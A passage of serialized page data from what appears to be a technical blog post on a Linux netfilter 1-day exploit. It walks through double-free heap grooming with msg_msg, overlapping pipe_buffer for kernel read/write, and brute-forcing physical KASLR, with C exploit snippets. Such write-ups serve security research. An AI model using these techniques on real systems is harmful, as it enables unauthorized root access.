pointer",{"type":25,"tag":38,"props":61403,"children":61404},{},[61405,61407,61413,61415,61420,61422,61428],{"type":31,"value":61406},"Using the double-free vulnerability we can overlap a ",{"type":25,"tag":82,"props":61408,"children":61410},{"className":61409},[],[61411],{"type":31,"value":61412},"msg_msg",{"type":31,"value":61414}," object with with ",{"type":25,"tag":82,"props":61416,"children":61418},{"className":61417},[],[61419],{"type":31,"value":59067},{"type":31,"value":61421}," and control the ",{"type":25,"tag":82,"props":61423,"children":61425},{"className":61424},[],[61426],{"type":31,"value":61427},"m_list.next",{"type":31,"value":61429}," pointer.",{"type":25,"tag":206,"props":61431,"children":61433},{"className":33070,"code":61432,"language":33072,"meta":7,"style":7},"/* one msg_msg structure for each message */\nstruct msg_msg {\n struct list_head m_list;\n long m_type;\n size_t m_ts;  /* message text size */\n struct msg_msgseg *next;\n void *security;\n /* the actual message follows immediately */\n};\n[...]\nstruct list_head {\n struct list_head *next, *prev;\n};\n",[61434],{"type":25,"tag":82,"props":61435,"children":61436},{"__ignoreMap":7},[61437,61445,61461,61482,61495,61513,61538,61554,61562,61569,61576,61584,61616],{"type":25,"tag":216,"props":61438,"children":61439},{"class":6922,"line":6923},[61440],{"type":25,"tag":216,"props":61441,"children":61442},{"style":6927},[61443],{"type":31,"value":61444},"/* one msg_msg structure for each message */\n",{"type":25,"tag":216,"props":61446,"children":61447},{"class":6922,"line":6769},[61448,61452,61457],{"type":25,"tag":216,"props":61449,"children":61450},{"style":6936},[61451],{"type":31,"value":13357},{"type":25,"tag":216,"props":61453,"children":61454},{"style":7375},[61455],{"type":31,"value":61456}," msg_msg",{"type":25,"tag":216,"props":61458,"children":61459},{"style":6964},[61460],{"type":31,"value":7241},{"type":25,"tag":216,"props":61462,"children":61463},{"class":6922,"line":6778},[61464,61468,61473,61478],{"type":25,"tag":216,"props":61465,"children":61466},{"style":6936},[61467],{"type":31,"value":25111},{"type":25,"tag":216,"props":61469,"children":61470},{"style":7375},[61471],{"type":31,"value":61472}," list_head",{"type":25,"tag":216,"props":61474,"children":61475},{"style":6947},[61476],{"type":31,"value":61477}," m_list",{"type":25,"tag":216,"props":61479,"children":61480},{"style":6964},[61481],{"type":31,"value":6967},{"type":25,"tag":216,"props":61483,"children":61484},{"class":6922,"line":7005},[61485,61490],{"type":25,"tag":216,"props":61486,"children":61487},{"style":6936},[61488],{"type":31,"value":61489}," long",{"type":25,"tag":216,"props":61491,"children":61492},{"style":6964},[61493],{"type":31,"value":61494}," m_type;\n",{"type":25,"tag":216,"props":61496,"children":61497},{"class":6922,"line":7110},[61498,61503,61508],{"type":25,"tag":216,"props":61499,"children":61500},{"style":6936},[61501],{"type":31,"value":61502}," size_t",{"type":25,"tag":216,"props":61504,"children":61505},{"style":6964},[61506],{"type":31,"value":61507}," m_ts;",{"type":25,"tag":216,"props":61509,"children":61510},{"style":6927},[61511],{"type":31,"value":61512},"  /* message text size */\n",{"type":25,"tag":216,"props":61514,"children":61515},{"class":6922,"line":7216},[61516,61520,61525,61529,61534],{"type":25,"tag":216,"props":61517,"children":61518},{"style":6936},[61519],{"type":31,"value":25111},{"type":25,"tag":216,"props":61521,"children":61522},{"style":7375},[61523],{"type":31,"value":61524}," msg_msgseg",{"type":25,"tag":216,"props":61526,"children":61527},{"style":6936},[61528],{"type":31,"value":13773},{"type":25,"tag":216,"props":61530,"children":61531},{"style":6947},[61532],{"type":31,"value":61533},"next",{"type":25,"tag":216,"props":61535,"children":61536},{"style":6964},[61537],{"type":31,"value":6967},{"type":25,"tag":216,"props":61539,"children":61540},{"class":6922,"line":7244},[61541,61545,61549],{"type":25,"tag":216,"props":61542,"children":61543},{"style":6936},[61544],{"type":31,"value":55018},{"type":25,"tag":216,"props":61546,"children":61547},{"style":6953},[61548],{"type":31,"value":13773},{"type":25,"tag":216,"props":61550,"children":61551},{"style":6964},[61552],{"type":31,"value":61553},"security;\n",{"type":25,"tag":216,"props":61555,"children":61556},{"class":6922,"line":7257},[61557],{"type":25,"tag":216,"props":61558,"children":61559},{"style":6927},[61560],{"type":31,"value":61561}," /* the actual message follows immediately */\n",{"type":25,"tag":216,"props":61563,"children":61564},{"class":6922,"line":7275},[61565],{"type":25,"tag":216,"props":61566,"children":61567},{"style":6964},[61568],{"type":31,"value":20536},{"type":25,"tag":216,"props":61570,"children":61571},{"class":6922,"line":7296},[61572],{"type":25,"tag":216,"props":61573,"children":61574},{"style":6964},[61575],{"type":31,"value":14275},{"type":25,"tag":216,"props":61577,"children":61578},{"class":6922,"line":7305},[61579],{"type":25,"tag":216,"props":61580,"children":61581},{"style":6964},[61582],{"type":31,"value":61583},"struct list_head {\n",{"type":25,"tag":216,"props":61585,"children":61586},{"class":6922,"line":7557},[61587,61591,61595,61599,61603,61607,61611],{"type":25,"tag":216,"props":61588,"children":61589},{"style":6936},[61590],{"type":31,"value":25111},{"type":25,"tag":216,"props":61592,"children":61593},{"style":7375},[61594],{"type":31,"value":61472},{"type":25,"tag":216,"props":61596,"children":61597},{"style":6936},[61598],{"type":31,"value":13773},{"type":25,"tag":216,"props":61600,"children":61601},{"style":6947},[61602],{"type":31,"value":61533},{"type":25,"tag":216,"props":61604,"children":61605},{"style":6964},[61606],{"type":31,"value":7026},{"type":25,"tag":216,"props":61608,"children":61609},{"style":6953},[61610],{"type":31,"value":8519},{"type":25,"tag":216,"props":61612,"children":61613},{"style":6964},[61614],{"type":31,"value":61615},"prev;\n",{"type":25,"tag":216,"props":61617,"children":61618},{"class":6922,"line":7574},[61619],{"type":25,"tag":216,"props":61620,"children":61621},{"style":6964},[61622],{"type":31,"value":20536},{"type":25,"tag":38,"props":61624,"children":61625},{},[61626,61628,61634,61636,61641],{"type":31,"value":61627},"This is particularly interesting if we send messages of different sizes on the same queue, making the ",{"type":25,"tag":82,"props":61629,"children":61631},{"className":61630},[],[61632],{"type":31,"value":61633},"mlist.next",{"type":31,"value":61635}," pointer of a message that lives in one cache point into a different cache. So, by spraying ",{"type":25,"tag":82,"props":61637,"children":61639},{"className":61638},[],[61640],{"type":31,"value":61412},{"type":31,"value":61642}," in kmalloc-cg-256 with a secondary message in each queue living in kmalloc-cg-1k.",{"type":25,"tag":38,"props":61644,"children":61645},{},[61646,61648,61653,61655],{"type":31,"value":61647},"By incrementing the next pointer of our controllable ",{"type":25,"tag":82,"props":61649,"children":61651},{"className":61650},[],[61652],{"type":31,"value":61412},{"type":31,"value":61654}," by 256, we are able to make it point to the different secondary message that is already referenced by a different primary message, creating a duplicated reference. We allow an easy way of pivoting our double-free capabilities to other caches and attacking a greater variety of objects.\n",{"type":25,"tag":6467,"props":61656,"children":61658},{"alt":54547,"src":61657},"/posts/netfilter-universal-root-1-day/msg-msg.png",[],{"type":25,"tag":206,"props":61660,"children":61662},{"className":33070,"code":61661,"language":33072,"meta":7,"style":7},"[...]\n    // Spray msg_msg in kmalloc-256 and kmalloc-1k\n    msg_t *msg = calloc(1, sizeof(msg_t) + 0xe8 - 48);\n    int qid[SPRAY];\n    for (int i = 0; i \u003C SPRAY; i++)\n    {\n        qid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);\n        if (qid[i] \u003C 0)\n        {\n            perror(\"[-] msgget\");\n        }\n        *(uint32_t *)msg->mtext = i;\n        *(uint64_t *)&msg->mtext[8] = 0xdeadbeefcafebabe;\n        msg->mtype = MTYPE_PRIMARY;\n        msgsnd(qid[i], msg, 0xe8 - 48, 0);\n        msg->mtype = MTYPE_SECONDARY;\n        msgsnd(qid[i], msg, 1024 - 48, 0);\n    }\n    // Prepare evil msg\n    int evilqid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);\n    if (evilqid \u003C 0)\n    {\n        perror(\"[-] msgget\");\n    }\n[...] // trigger double-free in kmalloc-256\n",[61663],{"type":25,"tag":82,"props":61664,"children":61665},{"__ignoreMap":7},[61666,61673,61681,61707,61724,61772,61779,61819,61851,61858,61879,61886,61933,61997,62023,62069,62093,62137,62144,62152,62188,62212,62219,62239,62246],{"type":25,"tag":216,"props":61667,"children":61668},{"class":6922,"line":6923},[61669],{"type":25,"tag":216,"props":61670,"children":61671},{"style":6964},[61672],{"type":31,"value":14275},{"type":25,"tag":216,"props":61674,"children":61675},{"class":6922,"line":6769},[61676],{"type":25,"tag":216,"props":61677,"children":61678},{"style":6964},[61679],{"type":31,"value":61680},"    // Spray msg_msg in kmalloc-256 and kmalloc-1k\n",{"type":25,"tag":216,"props":61682,"children":61683},{"class":6922,"line":6778},[61684,61689,61693,61697,61702],{"type":25,"tag":216,"props":61685,"children":61686},{"style":6964},[61687],{"type":31,"value":61688},"    msg_t *msg = calloc(1, ",{"type":25,"tag":216,"props":61690,"children":61691},{"style":7375},[61692],{"type":31,"value":59296},{"type":25,"tag":216,"props":61694,"children":61695},{"style":6964},[61696],{"type":31,"value":1850},{"type":25,"tag":216,"props":61698,"children":61699},{"style":7375},[61700],{"type":31,"value":61701},"msg_t",{"type":25,"tag":216,"props":61703,"children":61704},{"style":6964},[61705],{"type":31,"value":61706},") + 0xe8 - 48);\n",{"type":25,"tag":216,"props":61708,"children":61709},{"class":6922,"line":7005},[61710,61714,61719],{"type":25,"tag":216,"props":61711,"children":61712},{"style":6936},[61713],{"type":31,"value":23037},{"type":25,"tag":216,"props":61715,"children":61716},{"style":6947},[61717],{"type":31,"value":61718}," qid",{"type":25,"tag":216,"props":61720,"children":61721},{"style":6964},[61722],{"type":31,"value":61723},"[SPRAY];\n",{"type":25,"tag":216,"props":61725,"children":61726},{"class":6922,"line":7110},[61727,61731,61735,61739,61743,61747,61751,61755,61759,61764,61768],{"type":25,"tag":216,"props":61728,"children":61729},{"style":6973},[61730],{"type":31,"value":6976},{"type":25,"tag":216,"props":61732,"children":61733},{"style":6964},[61734],{"type":31,"value":7016},{"type":25,"tag":216,"props":61736,"children":61737},{"style":6936},[61738],{"type":31,"value":23007},{"type":25,"tag":216,"props":61740,"children":61741},{"style":6964},[61742],{"type":31,"value":58512},{"type":25,"tag":216,"props":61744,"children":61745},{"style":6953},[61746],{"type":31,"value":266},{"type":25,"tag":216,"props":61748,"children":61749},{"style":6989},[61750],{"type":31,"value":6992},{"type":25,"tag":216,"props":61752,"children":61753},{"style":6964},[61754],{"type":31,"value":55202},{"type":25,"tag":216,"props":61756,"children":61757},{"style":6953},[61758],{"type":31,"value":9757},{"type":25,"tag":216,"props":61760,"children":61761},{"style":6964},[61762],{"type":31,"value":61763}," SPRAY; i",{"type":25,"tag":216,"props":61765,"children":61766},{"style":6953},[61767],{"type":31,"value":55238},{"type":25,"tag":216,"props":61769,"children":61770},{"style":6964},[61771],{"type":31,"value":7107},{"type":25,"tag":216,"props":61773,"children":61774},{"class":6922,"line":7216},[61775],{"type":25,"tag":216,"props":61776,"children":61777},{"style":6964},[61778],{"type":31,"value":33147},{"type":25,"tag":216,"props":61780,"children":61781},{"class":6922,"line":7244},[61782,61787,61791,61795,61800,61805,61810,61814],{"type":25,"tag":216,"props":61783,"children":61784},{"style":6947},[61785],{"type":31,"value":61786},"        qid",{"type":25,"tag":216,"props":61788,"children":61789},{"style":6964},[61790],{"type":31,"value":58564},{"type":25,"tag":216,"props":61792,"children":61793},{"style":6953},[61794],{"type":31,"value":266},{"type":25,"tag":216,"props":61796,"children":61797},{"style":7047},[61798],{"type":31,"value":61799}," msgget",{"type":25,"tag":216,"props":61801,"children":61802},{"style":6964},[61803],{"type":31,"value":61804},"(IPC_PRIVATE, ",{"type":25,"tag":216,"props":61806,"children":61807},{"style":6989},[61808],{"type":31,"value":61809},"0666",{"type":25,"tag":216,"props":61811,"children":61812},{"style":6953},[61813],{"type":31,"value":8218},{"type":25,"tag":216,"props":61815,"children":61816},{"style":6964},[61817],{"type":31,"value":61818}," IPC_CREAT);\n",{"type":25,"tag":216,"props":61820,"children":61821},{"class":6922,"line":7257},[61822,61826,61830,61835,61839,61843,61847],{"type":25,"tag":216,"props":61823,"children":61824},{"style":6973},[61825],{"type":31,"value":7222},{"type":25,"tag":216,"props":61827,"children":61828},{"style":6964},[61829],{"type":31,"value":7016},{"type":25,"tag":216,"props":61831,"children":61832},{"style":6947},[61833],{"type":31,"value":61834},"qid",{"type":25,"tag":216,"props":61836,"children":61837},{"style":6964},[61838],{"type":31,"value":58564},{"type":25,"tag":216,"props":61840,"children":61841},{"style":6953},[61842],{"type":31,"value":9757},{"type":25,"tag":216,"props":61844,"children":61845},{"style":6989},[61846],{"type":31,"value":6992},{"type":25,"tag":216,"props":61848,"children":61849},{"style":6964},[61850],{"type":31,"value":7107},{"type":25,"tag":216,"props":61852,"children":61853},{"class":6922,"line":7275},[61854],{"type":25,"tag":216,"props":61855,"children":61856},{"style":6964},[61857],{"type":31,"value":35621},{"type":25,"tag":216,"props":61859,"children":61860},{"class":6922,"line":7296},[61861,61866,61870,61875],{"type":25,"tag":216,"props":61862,"children":61863},{"style":7047},[61864],{"type":31,"value":61865},"            perror",{"type":25,"tag":216,"props":61867,"children":61868},{"style":6964},[61869],{"type":31,"value":1850},{"type":25,"tag":216,"props":61871,"children":61872},{"style":8205},[61873],{"type":31,"value":61874},"\"[-] msgget\"",{"type":25,"tag":216,"props":61876,"children":61877},{"style":6964},[61878],{"type":31,"value":7797},{"type":25,"tag":216,"props":61880,"children":61881},{"class":6922,"line":7305},[61882],{"type":25,"tag":216,"props":61883,"children":61884},{"style":6964},[61885],{"type":31,"value":7302},{"type":25,"tag":216,"props":61887,"children":61888},{"class":6922,"line":7557},[61889,61893,61897,61902,61906,61910,61915,61919,61924,61928],{"type":25,"tag":216,"props":61890,"children":61891},{"style":6953},[61892],{"type":31,"value":11703},{"type":25,"tag":216,"props":61894,"children":61895},{"style":6964},[61896],{"type":31,"value":1850},{"type":25,"tag":216,"props":61898,"children":61899},{"style":6936},[61900],{"type":31,"value":61901},"uint32_t",{"type":25,"tag":216,"props":61903,"children":61904},{"style":6953},[61905],{"type":31,"value":13773},{"type":25,"tag":216,"props":61907,"children":61908},{"style":6964},[61909],{"type":31,"value":1888},{"type":25,"tag":216,"props":61911,"children":61912},{"style":6947},[61913],{"type":31,"value":61914},"msg",{"type":25,"tag":216,"props":61916,"children":61917},{"style":6964},[61918],{"type":31,"value":17714},{"type":25,"tag":216,"props":61920,"children":61921},{"style":6947},[61922],{"type":31,"value":61923},"mtext",{"type":25,"tag":216,"props":61925,"children":61926},{"style":6953},[61927],{"type":31,"value":6956},{"type":25,"tag":216,"props":61929,"children":61930},{"style":6964},[61931],{"type":31,"value":61932}," i;\n",{"type":25,"tag":216,"props":61934,"children":61935},{"class":6922,"line":7574},[61936,61940,61944,61948,61952,61956,61960,61964,61968,61972,61976,61980,61984,61988,61993],{"type":25,"tag":216,"props":61937,"children":61938},{"style":6953},[61939],{"type":31,"value":11703},{"type":25,"tag":216,"props":61941,"children":61942},{"style":6964},[61943],{"type":31,"value":1850},{"type":25,"tag":216,"props":61945,"children":61946},{"style":6936},[61947],{"type":31,"value":59603},{"type":25,"tag":216,"props":61949,"children":61950},{"style":6953},[61951],{"type":31,"value":13773},{"type":25,"tag":216,"props":61953,"children":61954},{"style":6964},[61955],{"type":31,"value":1888},{"type":25,"tag":216,"props":61957,"children":61958},{"style":6953},[61959],{"type":31,"value":7059},{"type":25,"tag":216,"props":61961,"children":61962},{"style":6947},[61963],{"type":31,"value":61914},{"type":25,"tag":216,"props":61965,"children":61966},{"style":6964},[61967],{"type":31,"value":17714},{"type":25,"tag":216,"props":61969,"children":61970},{"style":6947},[61971],{"type":31,"value":61923},{"type":25,"tag":216,"props":61973,"children":61974},{"style":6964},[61975],{"type":31,"value":7701},{"type":25,"tag":216,"props":61977,"children":61978},{"style":6989},[61979],{"type":31,"value":8031},{"type":25,"tag":216,"props":61981,"children":61982},{"style":6964},[61983],{"type":31,"value":12614},{"type":25,"tag":216,"props":61985,"children":61986},{"style":6953},[61987],{"type":31,"value":266},{"type":25,"tag":216,"props":61989,"children":61990},{"style":6989},[61991],{"type":31,"value":61992}," 0xdeadbeefcafebabe",{"type":25,"tag":216,"props":61994,"children":61995},{"style":6964},[61996],{"type":31,"value":6967},{"type":25,"tag":216,"props":61998,"children":61999},{"class":6922,"line":7591},[62000,62005,62009,62014,62018],{"type":25,"tag":216,"props":62001,"children":62002},{"style":6947},[62003],{"type":31,"value":62004},"        msg",{"type":25,"tag":216,"props":62006,"children":62007},{"style":6964},[62008],{"type":31,"value":17714},{"type":25,"tag":216,"props":62010,"children":62011},{"style":6947},[62012],{"type":31,"value":62013},"mtype",{"type":25,"tag":216,"props":62015,"children":62016},{"style":6953},[62017],{"type":31,"value":6956},{"type":25,"tag":216,"props":62019,"children":62020},{"style":6964},[62021],{"type":31,"value":62022}," MTYPE_PRIMARY;\n",{"type":25,"tag":216,"props":62024,"children":62025},{"class":6922,"line":7604},[62026,62031,62035,62039,62044,62048,62052,62057,62061,62065],{"type":25,"tag":216,"props":62027,"children":62028},{"style":7047},[62029],{"type":31,"value":62030},"        msgsnd",{"type":25,"tag":216,"props":62032,"children":62033},{"style":6964},[62034],{"type":31,"value":1850},{"type":25,"tag":216,"props":62036,"children":62037},{"style":6947},[62038],{"type":31,"value":61834},{"type":25,"tag":216,"props":62040,"children":62041},{"style":6964},[62042],{"type":31,"value":62043},"[i], msg, ",{"type":25,"tag":216,"props":62045,"children":62046},{"style":6989},[62047],{"type":31,"value":59940},{"type":25,"tag":216,"props":62049,"children":62050},{"style":6953},[62051],{"type":31,"value":55224},{"type":25,"tag":216,"props":62053,"children":62054},{"style":6989},[62055],{"type":31,"value":62056}," 48",{"type":25,"tag":216,"props":62058,"children":62059},{"style":6964},[62060],{"type":31,"value":7026},{"type":25,"tag":216,"props":62062,"children":62063},{"style":6989},[62064],{"type":31,"value":1882},{"type":25,"tag":216,"props":62066,"children":62067},{"style":6964},[62068],{"type":31,"value":7797},{"type":25,"tag":216,"props":62070,"children":62071},{"class":6922,"line":7613},[62072,62076,62080,62084,62088],{"type":25,"tag":216,"props":62073,"children":62074},{"style":6947},[62075],{"type":31,"value":62004},{"type":25,"tag":216,"props":62077,"children":62078},{"style":6964},[62079],{"type":31,"value":17714},{"type":25,"tag":216,"props":62081,"children":62082},{"style":6947},[62083],{"type":31,"value":62013},{"type":25,"tag":216,"props":62085,"children":62086},{"style":6953},[62087],{"type":31,"value":6956},{"type":25,"tag":216,"props":62089,"children":62090},{"style":6964},[62091],{"type":31,"value":62092}," MTYPE_SECONDARY;\n",{"type":25,"tag":216,"props":62094,"children":62095},{"class":6922,"line":7636},[62096,62100,62104,62108,62112,62117,62121,62125,62129,62133],{"type":25,"tag":216,"props":62097,"children":62098},{"style":7047},[62099],{"type":31,"value":62030},{"type":25,"tag":216,"props":62101,"children":62102},{"style":6964},[62103],{"type":31,"value":1850},{"type":25,"tag":216,"props":62105,"children":62106},{"style":6947},[62107],{"type":31,"value":61834},{"type":25,"tag":216,"props":62109,"children":62110},{"style":6964},[62111],{"type":31,"value":62043},{"type":25,"tag":216,"props":62113,"children":62114},{"style":6989},[62115],{"type":31,"value":62116},"1024",{"type":25,"tag":216,"props":62118,"children":62119},{"style":6953},[62120],{"type":31,"value":55224},{"type":25,"tag":216,"props":62122,"children":62123},{"style":6989},[62124],{"type":31,"value":62056},{"type":25,"tag":216,"props":62126,"children":62127},{"style":6964},[62128],{"type":31,"value":7026},{"type":25,"tag":216,"props":62130,"children":62131},{"style":6989},[62132],{"type":31,"value":1882},{"type":25,"tag":216,"props":62134,"children":62135},{"style":6964},[62136],{"type":31,"value":7797},{"type":25,"tag":216,"props":62138,"children":62139},{"class":6922,"line":7645},[62140],{"type":25,"tag":216,"props":62141,"children":62142},{"style":6964},[62143],{"type":31,"value":7311},{"type":25,"tag":216,"props":62145,"children":62146},{"class":6922,"line":7654},[62147],{"type":25,"tag":216,"props":62148,"children":62149},{"style":6927},[62150],{"type":31,"value":62151},"    // Prepare evil msg\n",{"type":25,"tag":216,"props":62153,"children":62154},{"class":6922,"line":7722},[62155,62159,62164,62168,62172,62176,62180,62184],{"type":25,"tag":216,"props":62156,"children":62157},{"style":6936},[62158],{"type":31,"value":23037},{"type":25,"tag":216,"props":62160,"children":62161},{"style":6964},[62162],{"type":31,"value":62163}," evilqid ",{"type":25,"tag":216,"props":62165,"children":62166},{"style":6953},[62167],{"type":31,"value":266},{"type":25,"tag":216,"props":62169,"children":62170},{"style":7047},[62171],{"type":31,"value":61799},{"type":25,"tag":216,"props":62173,"children":62174},{"style":6964},[62175],{"type":31,"value":61804},{"type":25,"tag":216,"props":62177,"children":62178},{"style":6989},[62179],{"type":31,"value":61809},{"type":25,"tag":216,"props":62181,"children":62182},{"style":6953},[62183],{"type":31,"value":8218},{"type":25,"tag":216,"props":62185,"children":62186},{"style":6964},[62187],{"type":31,"value":61818},{"type":25,"tag":216,"props":62189,"children":62190},{"class":6922,"line":7730},[62191,62195,62200,62204,62208],{"type":25,"tag":216,"props":62192,"children":62193},{"style":6973},[62194],{"type":31,"value":16235},{"type":25,"tag":216,"props":62196,"children":62197},{"style":6964},[62198],{"type":31,"value":62199}," (evilqid ",{"type":25,"tag":216,"props":62201,"children":62202},{"style":6953},[62203],{"type":31,"value":9757},{"type":25,"tag":216,"props":62205,"children":62206},{"style":6989},[62207],{"type":31,"value":6992},{"type":25,"tag":216,"props":62209,"children":62210},{"style":6964},[62211],{"type":31,"value":7107},{"type":25,"tag":216,"props":62213,"children":62214},{"class":6922,"line":7760},[62215],{"type":25,"tag":216,"props":62216,"children":62217},{"style":6964},[62218],{"type":31,"value":33147},{"type":25,"tag":216,"props":62220,"children":62221},{"class":6922,"line":7768},[62222,62227,62231,62235],{"type":25,"tag":216,"props":62223,"children":62224},{"style":7047},[62225],{"type":31,"value":62226},"        perror",{"type":25,"tag":216,"props":62228,"children":62229},{"style":6964},[62230],{"type":31,"value":1850},{"type":25,"tag":216,"props":62232,"children":62233},{"style":8205},[62234],{"type":31,"value":61874},{"type":25,"tag":216,"props":62236,"children":62237},{"style":6964},[62238],{"type":31,"value":7797},{"type":25,"tag":216,"props":62240,"children":62241},{"class":6922,"line":7800},[62242],{"type":25,"tag":216,"props":62243,"children":62244},{"style":6964},[62245],{"type":31,"value":7311},{"type":25,"tag":216,"props":62247,"children":62248},{"class":6922,"line":7808},[62249],{"type":25,"tag":216,"props":62250,"children":62251},{"style":6964},[62252],{"type":31,"value":62253},"[...] // trigger double-free in kmalloc-256\n",{"type":25,"tag":606,"props":62255,"children":62257},{"id":62256},"using-pipe_buffer-page-pointer-for-physical-readwrite",[62258],{"type":31,"value":62259},"Using pipe_buffer->page pointer for physical read/write",{"type":25,"tag":38,"props":62261,"children":62262},{},[62263,62265,62271,62272,62278,62279,62285,62287,62293],{"type":31,"value":62264},"Now that we have increased the reach of our double-free, it's probably a good idea to go to ",{"type":25,"tag":82,"props":62266,"children":62268},{"className":62267},[],[62269],{"type":31,"value":62270},"kmalloc-1k",{"type":31,"value":1307},{"type":25,"tag":82,"props":62273,"children":62275},{"className":62274},[],[62276],{"type":31,"value":62277},"overlap pipe_buffer",{"type":31,"value":25464},{"type":25,"tag":82,"props":62280,"children":62282},{"className":62281},[],[62283],{"type":31,"value":62284},"skbuf",{"type":31,"value":62286}," data to control the ",{"type":25,"tag":82,"props":62288,"children":62290},{"className":62289},[],[62291],{"type":31,"value":62292},"page",{"type":31,"value":704},{"type":25,"tag":38,"props":62295,"children":62296},{},[62297,62298,62303,62305,62311,62313],{"type":31,"value":474},{"type":25,"tag":82,"props":62299,"children":62301},{"className":62300},[],[62302],{"type":31,"value":62292},{"type":31,"value":62304}," field is a pointer into ",{"type":25,"tag":82,"props":62306,"children":62308},{"className":62307},[],[62309],{"type":31,"value":62310},"vmemmap_base",{"type":31,"value":62312},", which contains all page structs used to track memory mapped to the kernel. This pointer is used to fetch the address of the data associated with a given pipe when reading/writing.\n",{"type":25,"tag":6467,"props":62314,"children":62316},{"alt":54547,"src":62315},"/posts/netfilter-universal-root-1-day/pipe-buffer.png",[],{"type":25,"tag":38,"props":62318,"children":62319},{},[62320,62322,62327],{"type":31,"value":62321},"This now allows us to navigate the ",{"type":25,"tag":82,"props":62323,"children":62325},{"className":62324},[],[62326],{"type":31,"value":62310},{"type":31,"value":62328}," array and use our pipe as an interface to read/write kernel memory directly.",{"type":25,"tag":606,"props":62330,"children":62332},{"id":62331},"bruteforce-physical-kernel-base",[62333],{"type":31,"value":62334},"Bruteforce physical kernel base",{"type":25,"tag":38,"props":62336,"children":62337},{},[62338,62340,62346,62348,62353,62355,62361],{"type":31,"value":62339},"With the capability to iterate over kernel memory pages and read/write them, we could easily look for any value we want to overwrite, such as ",{"type":25,"tag":82,"props":62341,"children":62343},{"className":62342},[],[62344],{"type":31,"value":62345},"modprobe_path",{"type":31,"value":62347},". Keep in mind that simply searching page by page from the start of ",{"type":25,"tag":82,"props":62349,"children":62351},{"className":62350},[],[62352],{"type":31,"value":62310},{"type":31,"value":62354}," can be very time-consuming because the physical address at which the kernel base is loaded is randomized. However, the start of the kernel base is always aligned by a constant ",{"type":25,"tag":82,"props":62356,"children":62358},{"className":62357},[],[62359],{"type":31,"value":62360},"PHYSICAL_ALIGN",{"type":31,"value":62362}," value, 0x200000 by default in amd64, so we can significantly speed up our search by first only looking at aligned addresses for something that looks like the kernel base and then start a page by page search from there.",{"type":25,"tag":206,"props":62364,"children":62366},{"className":33070,"code":62365,"language":33072,"meta":7,"style":7},"[...]\n// Bruteforce phys-KASLR\n    uint64_t kernel_base;\n    bool found = false;\n    uint8_t data[PAGE_SIZE] = {0};\n    puts(\"[*] bruteforce phys-KASLR\");\n    for (uint64_t i = 0;; i++)\n    {\n        kernel_base = 0x40 * ((PHYSICAL_ALIGN * i) >> PAGE_SHIFT);\n        pipebuf->page = vmemmap_base + kernel_base;\n        pipebuf->offset = 0;\n        pipebuf->len = PAGE_SIZE + 1;\n[...]\n        for (int j = 0; j \u003C PIPE_SPRAY; j++)\n        {\n            memset(&data, 0, PAGE_SIZE);\n            int count;\n            if (count = read(pfd[j][0], &data, PAGE_SIZE) \u003C 0)\n            {\n                continue;\n            }\n[...]\n\n            if (is_kernel_base(data)) // [1] identify kernel base\n            {\n                found = true;\n                break;\n            }\n        }\n\n[...]\n",[62367],{"type":25,"tag":82,"props":62368,"children":62369},{"__ignoreMap":7},[62370,62377,62385,62393,62417,62450,62470,62510,62517,62561,62595,62622,62658,62665,62711,62718,62748,62761,62826,62833,62845,62853,62860,62867,62893,62900,62920,62932,62939,62946,62953],{"type":25,"tag":216,"props":62371,"children":62372},{"class":6922,"line":6923},[62373],{"type":25,"tag":216,"props":62374,"children":62375},{"style":6964},[62376],{"type":31,"value":14275},{"type":25,"tag":216,"props":62378,"children":62379},{"class":6922,"line":6769},[62380],{"type":25,"tag":216,"props":62381,"children":62382},{"style":6964},[62383],{"type":31,"value":62384},"// Bruteforce phys-KASLR\n",{"type":25,"tag":216,"props":62386,"children":62387},{"class":6922,"line":6778},[62388],{"type":25,"tag":216,"props":62389,"children":62390},{"style":6964},[62391],{"type":31,"value":62392},"    uint64_t kernel_base;\n",{"type":25,"tag":216,"props":62394,"children":62395},{"class":6922,"line":7005},[62396,62400,62405,62409,62413],{"type":25,"tag":216,"props":62397,"children":62398},{"style":6936},[62399],{"type":31,"value":50441},{"type":25,"tag":216,"props":62401,"children":62402},{"style":6964},[62403],{"type":31,"value":62404}," found ",{"type":25,"tag":216,"props":62406,"children":62407},{"style":6953},[62408],{"type":31,"value":266},{"type":25,"tag":216,"props":62410,"children":62411},{"style":6936},[62412],{"type":31,"value":13012},{"type":25,"tag":216,"props":62414,"children":62415},{"style":6964},[62416],{"type":31,"value":6967},{"type":25,"tag":216,"props":62418,"children":62419},{"class":6922,"line":7110},[62420,62425,62429,62434,62438,62442,62446],{"type":25,"tag":216,"props":62421,"children":62422},{"style":6936},[62423],{"type":31,"value":62424},"    uint8_t",{"type":25,"tag":216,"props":62426,"children":62427},{"style":6947},[62428],{"type":31,"value":19062},{"type":25,"tag":216,"props":62430,"children":62431},{"style":6964},[62432],{"type":31,"value":62433},"[PAGE_SIZE] ",{"type":25,"tag":216,"props":62435,"children":62436},{"style":6953},[62437],{"type":31,"value":266},{"type":25,"tag":216,"props":62439,"children":62440},{"style":6964},[62441],{"type":31,"value":49185},{"type":25,"tag":216,"props":62443,"children":62444},{"style":6989},[62445],{"type":31,"value":1882},{"type":25,"tag":216,"props":62447,"children":62448},{"style":6964},[62449],{"type":31,"value":20536},{"type":25,"tag":216,"props":62451,"children":62452},{"class":6922,"line":7216},[62453,62457,62461,62466],{"type":25,"tag":216,"props":62454,"children":62455},{"style":7047},[62456],{"type":31,"value":59475},{"type":25,"tag":216,"props":62458,"children":62459},{"style":6964},[62460],{"type":31,"value":1850},{"type":25,"tag":216,"props":62462,"children":62463},{"style":8205},[62464],{"type":31,"value":62465},"\"[*] bruteforce 